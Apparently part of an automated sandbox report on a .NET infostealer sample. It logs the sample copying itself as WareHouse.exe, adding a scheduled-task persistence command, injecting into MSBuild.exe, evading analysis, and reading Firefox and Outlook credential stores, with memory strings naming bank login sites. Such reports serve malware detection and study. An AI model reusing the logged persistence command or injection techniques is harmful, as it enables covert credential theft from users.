                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: edputil.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vbscript.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sxs.dll
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Mu7iyblZk8.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Mu7iyblZk8.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Mu7iyblZk8.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\Users\User\Desktop\Outputs\Omboxaav.pdb source: Mu7iyblZk8.exe, WareHouse.exe.0.dr
                  Source: Binary string: C:\Users\User\Desktop\Outputs\Omboxaav.pdbP source: Mu7iyblZk8.exe, WareHouse.exe.0.dr

                  Data Obfuscation

                  Source: Mu7iyblZk8.exe, PreventFromWeb.cs .Net Code: FOBDesusertion System.Reflection.Assembly.Load(byte[])
                  Source: WareHouse.exe.0.dr, PreventFromWeb.cs .Net Code: FOBDesusertion System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe Code function: 0_2_00007FF886E18167 push ebx; ret 0_2_00007FF886E1816A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0261F109 push eax; mov dword ptr [esp], ecx 3_2_0261F11C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0261F448 push eax; mov dword ptr [esp], ecx 3_2_0261F45C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0261D4A8 push eax; mov dword ptr [esp], ecx 3_2_0261D4BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0261D581 push eax; mov dword ptr [esp], ecx 3_2_0261D594
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Code function: 10_2_00007FF886E28167 push ebx; ret 10_2_00007FF886E2816A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 11_2_0128C8CA push eax; ret 11_2_0128C8D1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 11_2_0128C8D2 push eax; mov dword ptr [esp], ecx 11_2_0128C8DC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 11_2_0128E5F8 push eax; mov dword ptr [esp], ecx 11_2_0128E60C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 11_2_0128E78A push eax; mov dword ptr [esp], ecx 11_2_0128E79C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 11_2_05DEB081 push 4005E06Ah; ret 11_2_05DEB08D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 11_2_05E13E98 push eax; ret 11_2_05E13E9D
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe File created: C:\Users\user\AppData\Roaming\WareHouse.exe

                  Boot Survival

                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D6E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D504
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818DA04
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D6C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818DAA4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D304
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D0E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D784
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D384
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D424
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818E654
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D3C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D924
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D2E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D7A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D664
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D944
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D744
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D324
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818F3F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818F314
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D544
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FF90818D1A4
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory allocated: 2A80000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory allocated: 1AC80000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2610000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 27E0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 47E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory allocated: 1190000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory allocated: 1ACC0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1280000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2BE0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4BE0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeWindow / User API: threadDelayed 615
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3912
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5633
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3776
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5913
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe TID: 7820Thread sleep count: 615 > 30
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe TID: 7824Thread sleep count: 97 > 30
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exe TID: 7620Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7976Thread sleep count: 34 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7976Thread sleep time: -31359464925306218s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7980Thread sleep count: 3912 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7980Thread sleep count: 5633 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7988Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8008Thread sleep count: 150 > 30
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exe TID: 8096Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4020Thread sleep count: 47 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4020Thread sleep time: -43349848573217419s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4292Thread sleep count: 3776 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4292Thread sleep count: 5913 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4580Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4244Thread sleep count: 58 > 30
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1410420003.000000001BC28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWv
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                  Source: Mu7iyblZk8.exe, 00000000.00000002.1410420003.000000001BC28000.00000004.00000020.00020000.00000000.sdmp, Mu7iyblZk8.exe, 00000000.00000002.1404302143.0000000000DC3000.00000004.00000020.00020000.00000000.sdmp, WareHouse.exe, 0000000A.00000002.1464504535.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, WareHouse.exe, 0000000A.00000002.1466432583.000000001BBCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3814383672.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3814384925.0000000001027000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.3862598704.0000000007570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                  Source: MSBuild.exe, 00000003.00000002.3837160746.0000000003815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                  Source: MSBuild.exe, 00000003.00000002.3845308385.0000000006690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0261D238 LdrInitializeThunk,3_2_0261D238
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpack, ParentProcessUtil.csReference to suspicious API methods: NativeMethods.OpenProcess(PROCESS_QUERY_INFORMATION, bInheritHandle: false, (uint)id)
                  Source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: KernelLoadLibrary64(GeckoResourcePath + "nss3.dll")
                  Source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: HeavensGate.GetProcAddress64(NSS3, "NSS_Init")
                  Source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: HeavensGate.GetProcAddress64(num, "VirtualProtectEx")
                  Source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpack, FireFoxDecryptor.csReference to suspicious API methods: HeavensGate.GetProcAddress64(num, "WriteProcessMemory")
                  Source: 0.2.Mu7iyblZk8.exe.12c89ac0.2.raw.unpack, HeavensGateProcessor.csReference to suspicious API methods: NativeMethods.ReadProcessMemory(lpTargetHandle, (uint)processParameters, intPtr, (uint)Marshal.SizeOf(typeof(ulong)), ref lpNumberOfBytesRead)
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 432000
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 74F008
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 432000
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: C7E008
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUID
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "wmic" csproduct get UUID
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeQueries volume information: C:\Users\user\Desktop\Mu7iyblZk8.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
